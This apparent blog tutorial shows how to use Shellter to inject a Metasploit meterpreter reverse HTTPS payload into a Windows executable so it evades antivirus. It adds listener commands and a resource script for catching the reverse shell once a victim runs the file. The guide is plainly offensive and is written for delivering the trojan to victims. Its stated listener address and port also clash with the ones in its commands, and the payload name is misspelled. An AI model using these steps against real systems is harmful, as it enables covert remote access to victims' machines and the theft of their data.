Shellter is another antivirus evasion tool like veil-evasion framework, which infects the PE dynamically, can be used to inject the shell code into any 32-bit native Windows application. This framework enable us to either customize the payload or utilize the Metasploit framework in a sophisticated way. Most antivirus programs will not be able to identify the malicious executable, depending upon how the attackers re-encode endless number of signatures.
Shellter can be installed by running apt-get install shellter in the terminal of Kali Linux if you are not logged in as root user then use sudo apt-get install shellter. Once the application is installed, we can open Shellter by issuing shellter command in the terminal.
Now our objective is to create malicious executable file explained below in 7 steps:
- Attackers should be given the option to select either Auto (A) or Manual (M) and help (H). I am going to use Auto mode.
- Our 2nd step is to provide the PE target file; attackers can choose any exe file or utilize the executables in /usr/share/windows-binaries/.
- AfterPE target file location is provided, Shellter will be able to disassemble the PE file.
- In the end, Shellter will ask you to enable the stealth mode or not.
- Post stealth mode selection, you will be able to inject the listed payloads to the same PE file.
- I prefer meterpreter_reverse_HTTPS then provide the LHOST and LPORT.
- Everything is fine all info is fed to Shellter, and the same PE file provided as input is now injected with the payload and the injection is complete.
After creation of file you can scan with any antivirus program to verify. Once this executable is delivered to the victim, sender will now be able to open up the listener as per the payload; in my example, LHOST is 192.168.1.242 and LPORT is 5244:
set payload windows/meterpretere/reverse_HTTPS
set lhost 192.168.1.102
set lport 5544
set exitonsession false
exploit -j -z
To easily provoke the above commands you can save the preceding list of commands to a filename as listener.rc and run using Metasploit by running (msfconsole -r listener.rc). Once the victim opens the executable without being blocked by the antivirus or any security controls, it should open the tunnel to the attacker’s IP without any trouble. 🙂
Thanks for reading now let me recommend you some other practical guides about penetration testing of Remote Access Protocols, Remote Desktop Protocol, SSH Network Protocol, Network Routers, WordPress website using WPSeku,